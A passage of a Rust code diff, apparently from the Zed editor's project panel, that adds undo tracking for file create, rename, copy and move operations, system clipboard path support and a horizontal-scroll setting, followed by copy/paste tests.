gpui = { workspace = true, features = ["test-support"] }
language = { workspace = true, features = ["test-support"] }
+remote_connection = { workspace = true, features = ["test-support"] }
serde_json.workspace = true
tempfile.workspace = true
workspace = { workspace = true, features = ["test-support"] }
@@ -1,11 +1,12 @@
pub mod project_panel_settings;
+mod undo;
mod utils;
use anyhow::{Context as _, Result};
use client::{ErrorCode, ErrorExt};
use collections::{BTreeSet, HashMap, hash_map};
use command_palette_hooks::CommandPaletteFilter;
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use editor::{
Editor, EditorEvent, MultiBufferOffset,
items::{
@@ -13,20 +14,21 @@ use editor::{
entry_diagnostic_aware_icon_name_and_color, entry_git_aware_label_color,
},
};
+use feature_flags::{FeatureFlagAppExt, ProjectPanelUndoRedoFeatureFlag};
use file_icons::FileIcons;
use git;
use git::status::GitSummary;
use git_ui;
use git_ui::file_diff_view::FileDiffView;
use gpui::{
- Action, AnyElement, App, AsyncWindowContext, Bounds, ClipboardItem, Context, CursorStyle,
- DismissEvent, Div, DragMoveEvent, Entity, EventEmitter, ExternalPaths, FocusHandle, Focusable,
- FontWeight, Hsla, InteractiveElement, KeyContext, ListHorizontalSizingBehavior,
- ListSizingBehavior, Modifiers, ModifiersChangedEvent, MouseButton, MouseDownEvent,
- ParentElement, PathPromptOptions, Pixels, Point, PromptLevel, Render, ScrollStrategy, Stateful,
- Styled, Subscription, Task, UniformListScrollHandle, WeakEntity, Window, actions, anchored,
- deferred, div, hsla, linear_color_stop, linear_gradient, point, px, size, transparent_white,
- uniform_list,
+ Action, AnyElement, App, AsyncWindowContext, Bounds, ClipboardEntry as GpuiClipboardEntry,
+ ClipboardItem, Context, CursorStyle, DismissEvent, Div, DragMoveEvent, Entity, EventEmitter,
+ ExternalPaths, FocusHandle, Focusable, FontWeight, Hsla, InteractiveElement, KeyContext,
+ ListHorizontalSizingBehavior, ListSizingBehavior, Modifiers, ModifiersChangedEvent,
+ MouseButton, MouseDownEvent, ParentElement, PathPromptOptions, Pixels, Point, PromptLevel,
+ Render, ScrollStrategy, Stateful, Styled, Subscription, Task, UniformListScrollHandle,
+ WeakEntity, Window, actions, anchored, deferred, div, hsla, linear_color_stop, linear_gradient,
+ point, px, size, transparent_white, uniform_list,
};
use language::DiagnosticSeverity;
use menu::{Confirm, SelectFirst, SelectLast, SelectNext, SelectPrevious};
@@ -81,6 +83,8 @@ use zed_actions::{
workspace::OpenWithSystem,
};
+use crate::undo::{ProjectPanelOperation, UndoManager};
+
const PROJECT_PANEL_KEY: &str = "ProjectPanel";
const NEW_ENTRY_ID: ProjectEntryId = ProjectEntryId::MAX;
@@ -157,6 +161,7 @@ pub struct ProjectPanel {
sticky_items_count: usize,
last_reported_update: Instant,
update_visible_entries_task: UpdateVisibleEntriesTask,
+ undo_manager: UndoManager,
state: State,
}
@@ -394,6 +399,8 @@ actions!(
SelectPrevDirectory,
/// Opens a diff view to compare two marked files.
CompareMarkedFiles,
+ /// Undoes the last file operation.
+ Undo,
]
);
@@ -893,6 +900,7 @@ impl ProjectPanel {
unfolded_dir_ids: Default::default(),
},
update_visible_entries_task: Default::default(),
+ undo_manager: UndoManager::new(workspace.weak_handle()),
};
this.update_visible_entries(None, false, false, window, cx);
@@ -999,16 +1007,18 @@ impl ProjectPanel {
.ok()
.flatten()
{
- Some(serialization_key) => cx
- .background_spawn(async move { KEY_VALUE_STORE.read_kvp(&serialization_key) })
- .await
- .context("loading project panel")
- .log_err()
- .flatten()
- .map(|panel| serde_json::from_str::<SerializedProjectPanel>(&panel))
- .transpose()
- .log_err()
- .flatten(),
+ Some(serialization_key) => {
+ let kvp = cx.update(|_, cx| KeyValueStore::global(cx))?;
+ cx.background_spawn(async move { kvp.read_kvp(&serialization_key) })
+ .await
+ .context("loading project panel")
+ .log_err()
+ .flatten()
+ .map(|panel| serde_json::from_str::<SerializedProjectPanel>(&panel))
+ .transpose()
+ .log_err()
+ .flatten()
+ }
None => None,
};
@@ -1114,14 +1124,14 @@ impl ProjectPanel {
return;
};
let width = self.width;
+ let kvp = KeyValueStore::global(cx);
self.pending_serialization = cx.background_spawn(
async move {
- KEY_VALUE_STORE
- .write_kvp(
- serialization_key,
- serde_json::to_string(&SerializedProjectPanel { width })?,
- )
- .await?;
+ kvp.write_kvp(
+ serialization_key,
+ serde_json::to_string(&SerializedProjectPanel { width })?,
+ )
+ .await?;
anyhow::Ok(())
}
.log_err(),
@@ -1185,8 +1195,9 @@ impl ProjectPanel {
.is_some()
};
+ let has_pasteable_content = self.has_pasteable_content(cx);
let entity = cx.entity();
- let context_menu = ContextMenu::build(window, cx, |menu, _, _| {
+ let context_menu = ContextMenu::build(window, cx, |menu, _, cx| {
menu.context(self.focus_handle.clone()).map(|menu| {
if is_read_only {
menu.when(is_dir, |menu| {
@@ -1198,13 +1209,7 @@ impl ProjectPanel {
.separator()
.when(is_local, |menu| {
menu.action(
- if cfg!(target_os = "macos") && !is_remote {
- "Reveal in Finder"
- } else if cfg!(target_os = "windows") && !is_remote {
- "Reveal in File Explorer"
- } else {
- "Reveal in File Manager"
- },
+ ui::utils::reveal_in_file_manager_label(is_remote),
Box::new(RevealInFileManager),
)
})
@@ -1231,11 +1236,14 @@ impl ProjectPanel {
.action("Copy", Box::new(Copy))
.action("Duplicate", Box::new(Duplicate))
// TODO: Paste should always be visible, cbut disabled when clipboard is empty
- .action_disabled_when(
- self.clipboard.as_ref().is_none(),
- "Paste",
- Box::new(Paste),
- )
+ .action_disabled_when(!has_pasteable_content, "Paste", Box::new(Paste))
+ .when(cx.has_flag::<ProjectPanelUndoRedoFeatureFlag>(), |menu| {
+ menu.action_disabled_when(
+ !self.undo_manager.can_undo(),
+ "Undo",
+ Box::new(Undo),
+ )
+ })
.when(is_remote, |menu| {
menu.separator()
.action("Download...", Box::new(DownloadFromRemote))
@@ -1881,6 +1889,8 @@ impl ProjectPanel {
let edit_task;
let edited_entry_id;
+ let edited_entry;
+ let new_project_path: ProjectPath;
if is_new_entry {
self.selection = Some(SelectedEntry {
worktree_id,
@@ -1891,12 +1901,14 @@ impl ProjectPanel {
return None;
}
+ edited_entry = None;
edited_entry_id = NEW_ENTRY_ID;
+ new_project_path = (worktree_id, new_path).into();
edit_task = self.project.update(cx, |project, cx| {
- project.create_entry((worktree_id, new_path), is_dir, cx)
+ project.create_entry(new_project_path.clone(), is_dir, cx)
});
} else {
- let new_path = if let Some(parent) = entry.path.clone().parent() {
+ let new_path = if let Some(parent) = entry.path.parent() {
parent.join(&filename)
} else {
filename.clone()
@@ -1908,9 +1920,11 @@ impl ProjectPanel {
return None;
}
edited_entry_id = entry.id;
+ edited_entry = Some(entry);
+ new_project_path = (worktree_id, new_path).into();
edit_task = self.project.update(cx, |project, cx| {
- project.rename_entry(entry.id, (worktree_id, new_path).into(), cx)
- });
+ project.rename_entry(edited_entry_id, new_project_path.clone(), cx)
+ })
};
if refocus {
@@ -1923,6 +1937,22 @@ impl ProjectPanel {
let new_entry = edit_task.await;
project_panel.update(cx, |project_panel, cx| {
project_panel.state.edit_state = None;
+
+ // Record the operation if the edit was applied
+ if new_entry.is_ok() {
+ let operation = if let Some(old_entry) = edited_entry {
+ ProjectPanelOperation::Rename {
+ old_path: (worktree_id, old_entry.path).into(),
+ new_path: new_project_path,
+ }
+ } else {
+ ProjectPanelOperation::Create {
+ project_path: new_project_path,
+ }
+ };
+ project_panel.undo_manager.record(operation);
+ }
+
cx.notify();
})?;
@@ -2173,6 +2203,11 @@ impl ProjectPanel {
}
}
+ pub fn undo(&mut self, _: &Undo, _window: &mut Window, cx: &mut Context<Self>) {
+ self.undo_manager.undo(cx);
+ cx.notify();
+ }
+
fn rename_impl(
&mut self,
selection: Option<Range<usize>>,
@@ -2360,6 +2395,7 @@ impl ProjectPanel {
let project_path = project.path_for_entry(selection.entry_id, cx)?;
dirty_buffers +=
project.dirty_buffers(cx).any(|path| path == project_path) as usize;
+
Some((
selection.entry_id,
project_path.path.file_name()?.to_string(),
@@ -2371,6 +2407,11 @@ impl ProjectPanel {
}
let answer = if !skip_prompt {
let operation = if trash { "Trash" } else { "Delete" };
+ let message_start = if trash {
+ "Do you want to trash"
+ } else {
+ "Are you sure you want to permanently delete"
+ };
let prompt = match file_paths.first() {
Some((_, path)) if file_paths.len() == 1 => {
let unsaved_warning = if dirty_buffers > 0 {
@@ -2379,7 +2420,7 @@ impl ProjectPanel {
""
};
- format!("{operation} {path}?{unsaved_warning}")
+ format!("{message_start} {path}?{unsaved_warning}")
}
_ => {
const CUTOFF_POINT: usize = 10;
@@ -2411,14 +2452,20 @@ impl ProjectPanel {
};
format!(
- "Do you want to {} the following {} files?\n{}{unsaved_warning}",
- operation.to_lowercase(),
+ "{message_start} the following {} files?\n{}{unsaved_warning}",
file_paths.len(),
names.join("\n")
)
}
};
- Some(window.prompt(PromptLevel::Info, &prompt, None, &[operation, "Cancel"], cx))
+ let detail = (!trash).then_some("This cannot be undone.");
+ Some(window.prompt(
+ PromptLevel::Info,
+ &prompt,
+ detail,
+ &[operation, "Cancel"],
+ cx,
+ ))
} else {
None
};
@@ -2987,6 +3034,7 @@ impl ProjectPanel {
fn cut(&mut self, _: &Cut, _: &mut Window, cx: &mut Context<Self>) {
let entries = self.disjoint_effective_entries(cx);
if !entries.is_empty() {
+ self.write_entries_to_system_clipboard(&entries, cx);
self.clipboard = Some(ClipboardEntry::Cut(entries));
cx.notify();
}
@@ -2995,6 +3043,7 @@ impl ProjectPanel {
fn copy(&mut self, _: &Copy, _: &mut Window, cx: &mut Context<Self>) {
let entries = self.disjoint_effective_entries(cx);
if !entries.is_empty() {
+ self.write_entries_to_system_clipboard(&entries, cx);
self.clipboard = Some(ClipboardEntry::Copied(entries));
cx.notify();
}
@@ -3011,16 +3060,25 @@ impl ProjectPanel {
if target_entry.is_file() || (target_entry.is_dir() && target_entry.id == source.entry_id) {
new_path.pop();
}
- let clipboard_entry_file_name = self
+
+ let source_worktree = self
.project
.read(cx)
- .path_for_entry(source.entry_id, cx)?
- .path
- .file_name()?
- .to_string();
+ .worktree_for_entry(source.entry_id, cx)?;
+ let source_entry = source_worktree.read(cx).entry_for_id(source.entry_id)?;
+
+ let clipboard_entry_file_name = source_entry.path.file_name()?.to_string();
new_path.push(RelPath::unix(&clipboard_entry_file_name).unwrap());
- let extension = new_path.extension().map(|s| s.to_string());
- let file_name_without_extension = new_path.file_stem()?.to_string();
+
+ let (extension, file_name_without_extension) = if source_entry.is_file() {
+ (
+ new_path.extension().map(|s| s.to_string()),
+ new_path.file_stem()?.to_string(),
+ )
+ } else {
+ (None, clipboard_entry_file_name.clone())
+ };
+
let file_name_len = file_name_without_extension.len();
let mut disambiguation_range = None;
let mut ix = 0;
@@ -3056,6 +3114,17 @@ impl ProjectPanel {
}
fn paste(&mut self, _: &Paste, window: &mut Window, cx: &mut Context<Self>) {
+ if let Some(external_paths) = self.external_paths_from_system_clipboard(cx) {
+ let target_entry_id = self
+ .selection
+ .map(|s| s.entry_id)
+ .or(self.state.last_worktree_root_id);
+ if let Some(entry_id) = target_entry_id {
+ self.drop_external_files(external_paths.paths(), entry_id, window, cx);
+ }
+ return;
+ }
+
maybe!({
let (worktree, entry) = self.selected_entry_handle(cx)?;
let entry = entry.clone();
@@ -3066,8 +3135,15 @@ impl ProjectPanel {
.filter(|clipboard| !clipboard.items().is_empty())?;
enum PasteTask {
- Rename(Task<Result<CreatedEntry>>),
- Copy(Task<Result<Option<Entry>>>),
+ Rename {
+ task: Task<Result<CreatedEntry>>,
+ old_path: ProjectPath,
+ new_path: ProjectPath,
+ },
+ Copy {
+ task: Task<Result<Option<Entry>>>,
+ destination: ProjectPath,
+ },
}
let mut paste_tasks = Vec::new();
@@ -3077,16 +3153,22 @@ impl ProjectPanel {
let (new_path, new_disambiguation_range) =
self.create_paste_path(clipboard_entry, self.selected_sub_entry(cx)?, cx)?;
let clip_entry_id = clipboard_entry.entry_id;
+ let destination: ProjectPath = (worktree_id, new_path).into();
let task = if clipboard_entries.is_cut() {
+ let old_path = self.project.read(cx).path_for_entry(clip_entry_id, cx)?;
let task = self.project.update(cx, |project, cx| {
- project.rename_entry(clip_entry_id, (worktree_id, new_path).into(), cx)
+ project.rename_entry(clip_entry_id, destination.clone(), cx)
});
- PasteTask::Rename(task)
+ PasteTask::Rename {
+ task,
+ old_path,
+ new_path: destination,
+ }
} else {
let task = self.project.update(cx, |project, cx| {
- project.copy_entry(clip_entry_id, (worktree_id, new_path).into(), cx)
+ project.copy_entry(clip_entry_id, destination.clone(), cx)
});
- PasteTask::Copy(task)
+ PasteTask::Copy { task, destination }
};
paste_tasks.push(task);
disambiguation_range = new_disambiguation_range.or(disambiguation_range);
@@ -3097,26 +3179,44 @@ impl ProjectPanel {
cx.spawn_in(window, async move |project_panel, mut cx| {
let mut last_succeed = None;
+ let mut operations = Vec::new();
+
for task in paste_tasks {
match task {
- PasteTask::Rename(task) => {
+ PasteTask::Rename {
+ task,
+ old_path,
+ new_path,
+ } => {
if let Some(CreatedEntry::Included(entry)) = task
.await
.notify_workspace_async_err(workspace.clone(), &mut cx)
{
+ operations
+ .push(ProjectPanelOperation::Rename { old_path, new_path });
last_succeed = Some(entry);
}
}
- PasteTask::Copy(task) => {
+ PasteTask::Copy { task, destination } => {
if let Some(Some(entry)) = task
.await
.notify_workspace_async_err(workspace.clone(), &mut cx)
{
+ operations.push(ProjectPanelOperation::Create {
+ project_path: destination,
+ });
last_succeed = Some(entry);
}
}
}
}
+
+ project_panel
+ .update(cx, |this, _| {
+ this.undo_manager.record_batch(operations);
+ })
+ .ok();
+
// update selection
if let Some(entry) = last_succeed {
project_panel
@@ -3403,8 +3503,7 @@ impl ProjectPanel {
_: &mut Window,
cx: &mut Context<Self>,
) {
- if let Some((worktree, entry)) = self.selected_sub_entry(cx) {
- let path = worktree.read(cx).absolutize(&entry.path);
+ if let Some(path) = self.reveal_in_file_manager_path(cx) {
self.project
.update(cx, |project, cx| project.reveal_path(&path, cx));
}
@@ -3761,6 +3860,65 @@ impl ProjectPanel {
}
Some((worktree, entry))
}
+
+ fn reveal_in_file_manager_path(&self, cx: &App) -> Option<PathBuf> {
+ if let Some((worktree, entry)) = self.selected_sub_entry(cx) {
+ return Some(worktree.read(cx).absolutize(&entry.path));
+ }
+
+ let root_entry_id = self.state.last_worktree_root_id?;
+ let project = self.project.read(cx);
+ let worktree = project.worktree_for_entry(root_entry_id, cx)?;
+ let worktree = worktree.read(cx);
+ let root_entry = worktree.entry_for_id(root_entry_id)?;
+ Some(worktree.absolutize(&root_entry.path))
+ }
+
+ fn write_entries_to_system_clipboard(&self, entries: &BTreeSet<SelectedEntry>, cx: &mut App) {
+ let project = self.project.read(cx);
+ let paths: Vec<String> = entries
+ .iter()
+ .filter_map(|entry| {
+ let worktree = project.worktree_for_id(entry.worktree_id, cx)?;
+ let worktree = worktree.read(cx);
+ let worktree_entry = worktree.entry_for_id(entry.entry_id)?;
+ Some(
+ worktree
+ .abs_path()
+ .join(worktree_entry.path.as_std_path())
+ .to_string_lossy()
+ .to_string(),
+ )
+ })
+ .collect();
+ if !paths.is_empty() {
+ cx.write_to_clipboard(ClipboardItem::new_string(paths.join("\n")));
+ }
+ }
+
+ fn external_paths_from_system_clipboard(&self, cx: &App) -> Option<ExternalPaths> {
+ let clipboard_item = cx.read_from_clipboard()?;
+ for entry in clipboard_item.entries() {
+ if let GpuiClipboardEntry::ExternalPaths(paths) = entry {
+ if !paths.paths().is_empty() {
+ return Some(paths.clone());
+ }
+ }
+ }
+ None
+ }
+
+ fn has_pasteable_content(&self, cx: &App) -> bool {
+ if self
+ .clipboard
+ .as_ref()
+ .is_some_and(|c| !c.items().is_empty())
+ {
+ return true;
+ }
+ self.external_paths_from_system_clipboard(cx).is_some()
+ }
+
fn selected_entry_handle<'a>(
&self,
cx: &'a App,
@@ -4247,20 +4405,36 @@ impl ProjectPanel {
return Ok(());
}
- let task = worktree.update(cx, |worktree, cx| {
- worktree.copy_external_entries(target_directory, paths, fs, cx)
+ let (worktree_id, task) = worktree.update(cx, |worktree, cx| {
+ (
+ worktree.id(),
+ worktree.copy_external_entries(target_directory, paths, fs, cx),
+ )
});
let opened_entries: Vec<_> = task
.await
.with_context(|| "failed to copy external paths")?;
- this.update(cx, |this, cx| {
+ this.update_in(cx, |this, window, cx| {
+ let mut did_open = false;
if open_file_after_drop && !opened_entries.is_empty() {
let settings = ProjectPanelSettings::get_global(cx);
if settings.auto_open.should_open_on_drop() {
this.open_entry(opened_entries[0], true, false, cx);
+ did_open = true;
}
}
+
+ if !did_open {
+ let new_selection = opened_entries
+ .last()
+ .map(|&entry_id| (worktree_id, entry_id));
+ for &entry_id in &opened_entries {
+ this.expand_entry(worktree_id, entry_id, cx);
+ }
+ this.marked_entries.clear();
+ this.update_visible_entries(new_selection, false, false, window, cx);
+ }
})
}
.log_err()
@@ -4339,9 +4513,13 @@ impl ProjectPanel {
cx.spawn_in(window, async move |project_panel, cx| {
let mut last_succeed = None;
+ let mut operations = Vec::new();
for task in copy_tasks.into_iter() {
if let Some(Some(entry)) = task.await.log_err() {
last_succeed = Some(entry.id);
+ operations.push(ProjectPanelOperation::Create {
+ project_path: (worktree_id, entry.path).into(),
+ });
}
}
// update selection
@@ -4353,6 +4531,8 @@ impl ProjectPanel {
entry_id,
});
+ project_panel.undo_manager.record_batch(operations);
+
// if only one entry was dragged and it was disambiguated, open the rename editor
if item_count == 1 && disambiguation_range.is_some() {
project_panel.rename_impl(disambiguation_range, window, cx);
@@ -4402,6 +4582,23 @@ impl ProjectPanel {
(info, folded_entries)
};
+ // Capture old paths before moving so we can record undo operations.
+ let old_paths: HashMap<ProjectEntryId, ProjectPath> = {
+ let project = self.project.read(cx);
+ entries
+ .iter()
+ .filter_map(|entry| {
+ let path = project.path_for_entry(entry.entry_id, cx)?;
+ Some((entry.entry_id, path))
+ })
+ .collect()
+ };
+ let destination_worktree_id = self
+ .project
+ .read(cx)
+ .worktree_for_entry(target_entry_id, cx)
+ .map(|wt| wt.read(cx).id());
+
// Collect move tasks paired with their source entry ID so we can correlate
// results with folded selections that need refreshing.
let mut move_tasks: Vec<(ProjectEntryId, Task<Result<CreatedEntry>>)> = Vec::new();
@@ -4417,22 +4614,48 @@ impl ProjectPanel {
let workspace = self.workspace.clone();
if folded_selection_info.is_empty() {
- for (_, task) in move_tasks {
- let workspace = workspace.clone();
- cx.spawn_in(window, async move |_, mut cx| {
- task.await.notify_workspace_async_err(workspace, &mut cx);
- })
- .detach();
- }
+ cx.spawn_in(window, async move |project_panel, mut cx| {
+ let mut operations = Vec::new();
+ for (entry_id, task) in move_tasks {
+ if let Some(CreatedEntry::Included(new_entry)) = task
+ .await
+ .notify_workspace_async_err(workspace.clone(), &mut cx)
+ {
+ if let (Some(old_path), Some(worktree_id)) =
+ (old_paths.get(&entry_id), destination_worktree_id)
+ {
+ operations.push(ProjectPanelOperation::Rename {
+ old_path: old_path.clone(),
+ new_path: (worktree_id, new_entry.path).into(),
+ });
+ }
+ }
+ }
+ project_panel
+ .update(cx, |this, _| {
+ this.undo_manager.record_batch(operations);
+ })
+ .ok();
+ })
+ .detach();
} else {
cx.spawn_in(window, async move |project_panel, mut cx| {
// Await all move tasks and collect successful results
let mut move_results: Vec<(ProjectEntryId, Entry)> = Vec::new();
+ let mut operations = Vec::new();
for (entry_id, task) in move_tasks {
if let Some(CreatedEntry::Included(new_entry)) = task
.await
.notify_workspace_async_err(workspace.clone(), &mut cx)
{
+ if let (Some(old_path), Some(worktree_id)) =
+ (old_paths.get(&entry_id), destination_worktree_id)
+ {
+ operations.push(ProjectPanelOperation::Rename {
+ old_path: old_path.clone(),
+ new_path: (worktree_id, new_entry.path.clone()).into(),
+ });
+ }
move_results.push((entry_id, new_entry));
}
}
@@ -4441,6 +4664,12 @@ impl ProjectPanel {
return;
}
+ project_panel
+ .update(cx, |this, _| {
+ this.undo_manager.record_batch(operations);
+ })
+ .ok();
+
// For folded selections, we need to refresh the leaf paths (with suffixes)
// because they may not be indexed yet after the parent directory was moved.
// First collect the paths to refresh, then refresh them.
@@ -6317,6 +6546,7 @@ impl Render for ProjectPanel {
let panel_settings = ProjectPanelSettings::get_global(cx);
let indent_size = panel_settings.indent_size;
let show_indent_guides = panel_settings.indent_guides.show == ShowIndentGuides::Always;
+ let horizontal_scroll = panel_settings.scrollbar.horizontal_scroll;
let show_sticky_entries = {
if panel_settings.sticky_scroll {
let is_scrollable = self.scroll_handle.is_scrollable();
@@ -6452,6 +6682,9 @@ impl Render for ProjectPanel {
.on_action(cx.listener(Self::fold_directory))
.on_action(cx.listener(Self::remove_from_project))
.on_action(cx.listener(Self::compare_marked_files))
+ .when(cx.has_flag::<ProjectPanelUndoRedoFeatureFlag>(), |el| {
+ el.on_action(cx.listener(Self::undo))
+ })
.when(!project.is_read_only(cx), |el| {
el.on_action(cx.listener(Self::new_file))
.on_action(cx.listener(Self::new_directory))
@@ -6689,10 +6922,14 @@ impl Render for ProjectPanel {
})
})
.with_sizing_behavior(ListSizingBehavior::Infer)
- .with_horizontal_sizing_behavior(
- ListHorizontalSizingBehavior::Unconstrained,
- )
- .with_width_from_item(self.state.max_width_item_index)
+ .with_horizontal_sizing_behavior(if horizontal_scroll {
+ ListHorizontalSizingBehavior::Unconstrained
+ } else {
+ ListHorizontalSizingBehavior::FitList
+ })
+ .when(horizontal_scroll, |list| {
+ list.with_width_from_item(self.state.max_width_item_index)
+ })
.track_scroll(&self.scroll_handle),
)
.child(
@@ -6853,13 +7090,17 @@ impl Render for ProjectPanel {
.size_full(),
)
.custom_scrollbars(
- Scrollbars::for_settings::<ProjectPanelSettings>()
- .tracked_scroll_handle(&self.scroll_handle)
- .with_track_along(
- ScrollAxes::Horizontal,
- cx.theme().colors().panel_background,
- )
- .notify_content(),
+ {
+ let mut scrollbars = Scrollbars::for_settings::<ProjectPanelSettings>()
+ .tracked_scroll_handle(&self.scroll_handle);
+ if horizontal_scroll {
+ scrollbars = scrollbars.with_track_along(
+ ScrollAxes::Horizontal,
+ cx.theme().colors().panel_background,
+ );
+ }
+ scrollbars.notify_content()
+ },
window,
cx,
)
@@ -49,6 +49,11 @@ pub struct ScrollbarSettings {
///
/// Default: inherits editor scrollbar settings
pub show: Option<ShowScrollbar>,
+ /// Whether to allow horizontal scrolling in the project panel.
+ /// When false, the view is locked to the leftmost position and long file names are clipped.
+ ///
+ /// Default: true
+ pub horizontal_scroll: bool,
}
#[derive(Copy, Clone, Debug, Serialize, Deserialize, JsonSchema, PartialEq, Eq)]
@@ -111,8 +116,12 @@ impl Settings for ProjectPanelSettings {
auto_fold_dirs: project_panel.auto_fold_dirs.unwrap(),
bold_folder_labels: project_panel.bold_folder_labels.unwrap(),
starts_open: project_panel.starts_open.unwrap(),
- scrollbar: ScrollbarSettings {
- show: project_panel.scrollbar.unwrap().show.map(Into::into),
+ scrollbar: {
+ let scrollbar = project_panel.scrollbar.unwrap();
+ ScrollbarSettings {
+ show: scrollbar.show.map(Into::into),
+ horizontal_scroll: scrollbar.horizontal_scroll.unwrap(),
+ }
},
show_diagnostics: project_panel.show_diagnostics.unwrap(),
hide_root: project_panel.hide_root.unwrap(),
@@ -4,7 +4,7 @@ use editor::MultiBufferOffset;
use gpui::{Empty, Entity, TestAppContext, VisualTestContext};
use menu::Cancel;
use pretty_assertions::assert_eq;
-use project::FakeFs;
+use project::{FakeFs, ProjectPath};
use serde_json::json;
use settings::{ProjectPanelAutoOpenSettings, SettingsStore};
use std::path::{Path, PathBuf};
@@ -1635,7 +1635,10 @@ async fn test_copy_paste_directory(cx: &mut gpui::TestAppContext) {
"four.txt": "",
}
},
- "b": {}
+ "b": {},
+ "d.1.20": {
+ "default.conf": "",
+ }
}),
)
.await;
@@ -1688,6 +1691,7 @@ async fn test_copy_paste_directory(cx: &mut gpui::TestAppContext) {
" three.txt",
" one.txt",
" two.txt",
+ " > d.1.20",
]
);
@@ -1709,7 +1713,8 @@ async fn test_copy_paste_directory(cx: &mut gpui::TestAppContext) {
" four.txt",
" three.txt",
" one.txt",
- " two.txt"
+ " two.txt",
+ " > d.1.20",
]
);
@@ -1732,167 +1737,886 @@ async fn test_copy_paste_directory(cx: &mut gpui::TestAppContext) {
" four.txt",
" three.txt",
" one.txt",
- " two.txt"
+ " two.txt",
+ " > d.1.20",
+ ]
+ );
+
+ confirm.await.unwrap();
+
+ panel.update_in(cx, |panel, window, cx| {
+ panel.paste(&Default::default(), window, cx)
+ });
+ cx.executor().run_until_parked();
+ assert_eq!(
+ visible_entries_as_strings(&panel, 0..50, cx),
+ &[
+ //
+ "v root",
+ " > a",
+ " v b",
+ " v a",
+ " v inner_dir",
+ " four.txt",
+ " three.txt",
+ " one.txt",
+ " two.txt",
+ " v c",
+ " > a <== selected",
+ " > inner_dir",
+ " one.txt",
+ " two.txt",
+ " > d.1.20",
]
);
- confirm.await.unwrap();
+ select_path(&panel, "root/d.1.20", cx);
+ panel.update_in(cx, |panel, window, cx| {
+ panel.copy(&Default::default(), window, cx);
+ panel.paste(&Default::default(), window, cx);
+ });
+ cx.executor().run_until_parked();
+ assert_eq!(
+ visible_entries_as_strings(&panel, 0..50, cx),
+ &[
+ //
+ "v root",
+ " > a",
+ " v b",
+ " v a",
+ " v inner_dir",
+ " four.txt",
+ " three.txt",
+ " one.txt",
+ " two.txt",
+ " v c",
+ " > a",
+ " > inner_dir",
+ " one.txt",
+ " two.txt",
+ " v d.1.20",
+ " default.conf",
+ " > [EDITOR: 'd.1.20 copy'] <== selected",
+ ],
+ "Dotted directory names should not be split at the dot when disambiguating"
+ );
+}
+
+#[gpui::test]
+async fn test_copy_paste_directory_with_sibling_file(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/test",
+ json!({
+ "dir1": {
+ "a.txt": "",
+ "b.txt": "",
+ },
+ "dir2": {},
+ "c.txt": "",
+ "d.txt": "",
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), ["/test".as_ref()], cx).await;
+ let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = window
+ .read_with(cx, |mw, _| mw.workspace().clone())
+ .unwrap();
+ let cx = &mut VisualTestContext::from_window(window.into(), cx);
+ let panel = workspace.update_in(cx, ProjectPanel::new);
+ cx.run_until_parked();
+
+ toggle_expand_dir(&panel, "test/dir1", cx);
+
+ cx.simulate_modifiers_change(gpui::Modifiers {
+ control: true,
+ ..Default::default()
+ });
+
+ select_path_with_mark(&panel, "test/dir1", cx);
+ select_path_with_mark(&panel, "test/c.txt", cx);
+
+ assert_eq!(
+ visible_entries_as_strings(&panel, 0..15, cx),
+ &[
+ "v test",
+ " v dir1 <== marked",
+ " a.txt",
+ " b.txt",
+ " > dir2",
+ " c.txt <== selected <== marked",
+ " d.txt",
+ ],
+ "Initial state before copying dir1 and c.txt"
+ );
+
+ panel.update_in(cx, |panel, window, cx| {
+ panel.copy(&Default::default(), window, cx);
+ });
+ select_path(&panel, "test/dir2", cx);
+ panel.update_in(cx, |panel, window, cx| {
+ panel.paste(&Default::default(), window, cx);
+ });
+ cx.executor().run_until_parked();
+
+ toggle_expand_dir(&panel, "test/dir2/dir1", cx);
+
+ assert_eq!(
+ visible_entries_as_strings(&panel, 0..15, cx),
+ &[
+ "v test",
+ " v dir1 <== marked",
+ " a.txt",
+ " b.txt",
+ " v dir2",
+ " v dir1 <== selected",
+ " a.txt",
+ " b.txt",
+ " c.txt",
+ " c.txt <== marked",
+ " d.txt",
+ ],
+ "Should copy dir1 as well as c.txt into dir2"
+ );
+
+ // Disambiguating multiple files should not open the rename editor.
+ select_path(&panel, "test/dir2", cx);
+ panel.update_in(cx, |panel, window, cx| {
+ panel.paste(&Default::default(), window, cx);
+ });
+ cx.executor().run_until_parked();
+
+ assert_eq!(
+ visible_entries_as_strings(&panel, 0..15, cx),
+ &[
+ "v test",
+ " v dir1 <== marked",
+ " a.txt",
+ " b.txt",
+ " v dir2",
+ " v dir1",
+ " a.txt",
+ " b.txt",
+ " > dir1 copy <== selected",
+ " c.txt",
+ " c copy.txt",
+ " c.txt <== marked",
+ " d.txt",
+ ],
+ "Should copy dir1 as well as c.txt into dir2 and disambiguate them without opening the rename editor"
+ );
+}
+
+#[gpui::test]
+async fn test_copy_paste_nested_and_root_entries(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/test",
+ json!({
+ "dir1": {
+ "a.txt": "",
+ "b.txt": "",
+ },
+ "dir2": {},
+ "c.txt": "",
+ "d.txt": "",
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), ["/test".as_ref()], cx).await;
+ let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = window
+ .read_with(cx, |mw, _| mw.workspace().clone())
+ .unwrap();
+ let cx = &mut VisualTestContext::from_window(window.into(), cx);
+ let panel = workspace.update_in(cx, ProjectPanel::new);
+ cx.run_until_parked();
+
+ toggle_expand_dir(&panel, "test/dir1", cx);
+
+ cx.simulate_modifiers_change(gpui::Modifiers {
+ control: true,
+ ..Default::default()
+ });
+
+ select_path_with_mark(&panel, "test/dir1/a.txt", cx);
+ select_path_with_mark(&panel, "test/dir1", cx);
+ select_path_with_mark(&panel, "test/c.txt", cx);
+
+ assert_eq!(
+ visible_entries_as_strings(&panel, 0..15, cx),
+ &[
+ "v test",
+ " v dir1 <== marked",
+ " a.txt <== marked",
+ " b.txt",
+ " > dir2",
+ " c.txt <== selected <== marked",
+ " d.txt",
+ ],
